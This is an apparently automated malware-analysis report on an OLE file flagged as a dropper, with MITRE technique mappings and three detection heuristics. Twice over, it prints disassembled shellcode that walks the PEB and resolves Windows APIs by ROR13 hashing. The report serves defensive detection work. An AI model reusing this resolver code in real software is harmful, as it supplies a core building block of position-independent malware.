MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The OLE file has appended executable-looking payload bytes, indicating it likely serves as a dropper for a secondary malicious executable. The presence of PEB access and API hash resolution heuristics suggests the dropped payload employs anti-analysis techniques. No document body or script content was available for further analysis.
Heuristics 3
-
PEB access via FS segment (x86) high SC_PEB_ACCESSPEB access via FS segment (x86)
Disassembly
Attempted x86 opcode disassembly00028E0E 648b4030 mov eax, dword ptr fs:[eax + 0x30] 00028E12 8b400c mov eax, dword ptr [eax + 0xc] 00028E15 8b701c mov esi, dword ptr [eax + 0x1c] 00028E18 ad lodsd eax, dword ptr [esi] 00028E19 8b6808 mov ebp, dword ptr [eax + 8] 00028E1C 51 push ecx 00028E1D 56 push esi 00028E1E 57 push edi 00028E1F 8b453c mov eax, dword ptr [ebp + 0x3c] 00028E22 368b542878 mov edx, dword ptr ss:[eax + ebp + 0x78] 00028E27 03d5 add edx, ebp 00028E29 52 push edx 00028E2A 8b5220 mov edx, dword ptr [edx + 0x20] 00028E2D 03d5 add edx, ebp 00028E2F 33c0 xor eax, eax 00028E31 33c9 xor ecx, ecx 00028E33 41 inc ecx 00028E34 8b348a mov esi, dword ptr [edx + ecx*4] 00028E37 03f5 add esi, ebp 00028E39 33ff xor edi, edi 00028E3B c1cf0d ror edi, 0xd 00028E3E ac lodsb al, byte ptr [esi] 00028E3F 03f8 add edi, eax 00028E41 85c0 test eax, eax 00028E43 75f6 jne 0x28e3b 00028E45 3bfb cmp edi, ebx 00028E47 75ea jne 0x28e33 00028E49 5a pop edx 00028E4A 8b5a24 mov ebx, dword ptr [edx + 0x24] 00028E4D 03dd add ebx, ebp 00028E4F 668b0c4b mov cx, word ptr [ebx + ecx*2] 00028E53 8b5a1c mov ebx, dword ptr [edx + 0x1c] 00028E56 03dd add ebx, ebp 00028E58 8b048b mov eax, dword ptr [ebx + ecx*4] 00028E5B 03c5 add eax, ebp 00028E5D 5f pop edi 00028E5E 5e pop esi 00028E5F 59 pop ecx 00028E60 83f901 cmp ecx, 1 00028E63 7408 je 0x28e6d 00028E65 8bff mov edi, edi 00028E67 55 push ebp 00028E68 8bec mov ebp, esp 00028E6A 83c005 add eax, 5 00028E6D ff .byte 0xff
-
PEB API-hash resolver high SC_API_HASH_RESOLVERPEB access followed by ROR13-style API hashing, a common position-independent shellcode import resolver
Disassembly
Attempted x86 opcode disassembly00028E0E 648b4030 mov eax, dword ptr fs:[eax + 0x30] 00028E12 8b400c mov eax, dword ptr [eax + 0xc] 00028E15 8b701c mov esi, dword ptr [eax + 0x1c] 00028E18 ad lodsd eax, dword ptr [esi] 00028E19 8b6808 mov ebp, dword ptr [eax + 8] 00028E1C 51 push ecx 00028E1D 56 push esi 00028E1E 57 push edi 00028E1F 8b453c mov eax, dword ptr [ebp + 0x3c] 00028E22 368b542878 mov edx, dword ptr ss:[eax + ebp + 0x78] 00028E27 03d5 add edx, ebp 00028E29 52 push edx 00028E2A 8b5220 mov edx, dword ptr [edx + 0x20] 00028E2D 03d5 add edx, ebp 00028E2F 33c0 xor eax, eax 00028E31 33c9 xor ecx, ecx 00028E33 41 inc ecx 00028E34 8b348a mov esi, dword ptr [edx + ecx*4] 00028E37 03f5 add esi, ebp 00028E39 33ff xor edi, edi 00028E3B c1cf0d ror edi, 0xd 00028E3E ac lodsb al, byte ptr [esi] 00028E3F 03f8 add edi, eax 00028E41 85c0 test eax, eax 00028E43 75f6 jne 0x28e3b 00028E45 3bfb cmp edi, ebx 00028E47 75ea jne 0x28e33 00028E49 5a pop edx 00028E4A 8b5a24 mov ebx, dword ptr [edx + 0x24] 00028E4D 03dd add ebx, ebp 00028E4F 668b0c4b mov cx, word ptr [ebx + ecx*2] 00028E53 8b5a1c mov ebx, dword ptr [edx + 0x1c] 00028E56 03dd add ebx, ebp 00028E58 8b048b mov eax, dword ptr [ebx + ecx*4] 00028E5B 03c5 add eax, ebp 00028E5D 5f pop edi 00028E5E 5e pop esi 00028E5F 59 pop ecx 00028E60 83f901 cmp ecx, 1 00028E63 7408 je 0x28e6d 00028E65 8bff mov edi, edi 00028E67 55 push ebp 00028E68 8bec mov ebp, esp 00028E6A 83c005 add eax, 5 00028E6D ff .byte 0xff
-
OLE file has appended executable-looking payload bytes high OLE_APPENDED_PAYLOADOLE compound file contains a large high-entropy region beyond the declared major streams and that region includes shellcode, PE, or loader API markers. This is a payload-carrier signal, not a specific CVE attribution by itself.
Open this report in the interactive analyzer, or submit your own file for analysis.